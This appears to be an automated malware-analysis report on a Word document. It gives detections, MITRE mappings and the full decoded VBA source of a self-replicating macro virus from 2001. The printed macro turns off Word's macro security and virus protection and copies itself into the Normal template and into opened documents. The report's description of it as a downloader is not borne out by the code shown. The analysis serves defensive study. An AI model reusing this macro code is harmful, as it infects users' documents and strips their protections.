MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample is a malicious Word document containing VBA macros, specifically a Document_Open macro designed to execute automatically. The macro attempts to lower security settings and appears to be part of a downloader or dropper mechanism, as indicated by ClamAV detections of 'Win.Trojan.Psycho-3' and 'Win.Trojan.wmvg-1'. The document body presents a deceptive interface, likely to lure the user into enabling macros.
Heuristics 3
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10678 bytes |
SHA-256: d8e208b9d9e134d0f3cc635fe1460a298478e7e8d343f646fa4227b511dccf22 |
|||
|
Detection
ClamAV:
Win.Trojan.wmvg-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThissDocument"
Attribute VB_Base = "1Normal.ThissDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
' Если ты читаешь эти строки, значит ты уже немного шаришь
' в макросах, и это есть хорошо. Ты спаситель мира, и только
' ты должен разобраться как он работает и удалить Его. Удачи!.
' Этот код написан в чисто познавательных целях (конечно
' он немного левый, но я и не собирался написать крутой вирус
' и все похерить, просто он уничтожает все другие вирусы ...)
' С наилучшими пожеланиями Extremist 27.12.2001 :-)
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
'CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
'CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Set ActDoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set NormTemp = NormalTemplate.VBProject.VBComponents.Item(1)
NTColLn = NormTemp.CodeModule.CountOfLines
ADColLn = ActDoc.CodeModule.CountOfLines
BGN = 2
If ActDoc.Name <> "ThissDocument" Or ADColLn < 4 Then DoAD = True
If NormTemp.Name <> "ThissDocument" Or NTColLn < 4 Then DoNT = True
If DoNT <> True And DoAD <> True Then GoTo NoToInfect
'
If DoNT = True Then
NormTemp.Name = "ThissDocument"
If NTColLn > 0 Then NormTemp.CodeModule.DeleteLines 1, NTColLn
Do While ActDoc.CodeModule.Lines(1, 1) = ""
ActDoc.CodeModule.DeleteLines 1
Loop
NormTemp.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ActDoc.CodeModule.Lines(BGN, 1) <> ""
NormTemp.CodeModule.InsertLines BGN, ActDoc.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
'
If DoAD = True Then
ActDoc.Name = "ThissDocument"
If ADColLn > 0 Then ActDoc.CodeModule.DeleteLines 1, ADColLn
Do While NormTemp.CodeModule.Lines(1, 1) = ""
NormTemp.CodeModule.DeleteLines 1
Loop
ActDoc.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NormTemp.CodeModule.Lines(BGN, 1) <> ""
ActDoc.CodeModule.InsertLines BGN, NormTemp.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
NoToInfect:
'Destruct
If Year(Now) > 2001 And Rnd > 0.95 Then
Selection.EndKey wdStory
Selection.TypeParagraph
Selection.TypeText "Hi LameR": Selection.TypeParagraph
Selection.TypeText "The Extremist has you..": Selection.TypeParagraph
Selection.LanguageID = wdRussian
End If
'
If NTColLn <> 0 And ADColLn = 0 And (InStr(1, ActiveDocument.Name, "Документ") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Документ") = True) Then
ActiveDocument.Saved = True: End If
End Sub
' Processing file: /opt/analyzer/scan_staging/14573e48e7b04a4889dfdfd8981a0c55.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThissDocument - 5359 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' QuoteRem 0x0000 0x0039 " Если ты читаешь эти строки, значит ты уже немного шаришь"
' Line #2:
' QuoteRem 0x0000 0x003C " в макросах, и это есть хорошо. Ты спаситель мира, и только"
' Line #3:
' QuoteRem 0x0000 0x003D " ты должен разобраться как он работает и удалить Его. Удачи!."
' Line #4:
' QuoteRem 0x0000 0x0037 " Этот код написан в чисто познавательных целях (конечно"
' Line #5:
' QuoteRem 0x0000 0x003C " он немного левый, но я и не собирался написать крутой вирус"
' Line #6:
' QuoteRem 0x0000 0x003C " и все похерить, просто он уничтожает все другие вирусы ...)"
' Line #7:
' QuoteRem 0x0000 0x0032 " С наилучшими пожеланиями Extremist 27.12.2001 :-)"
' Line #8:
' OnError (Resume Next)
' Line #9:
' LitStr 0x0000 ""
' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\S
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.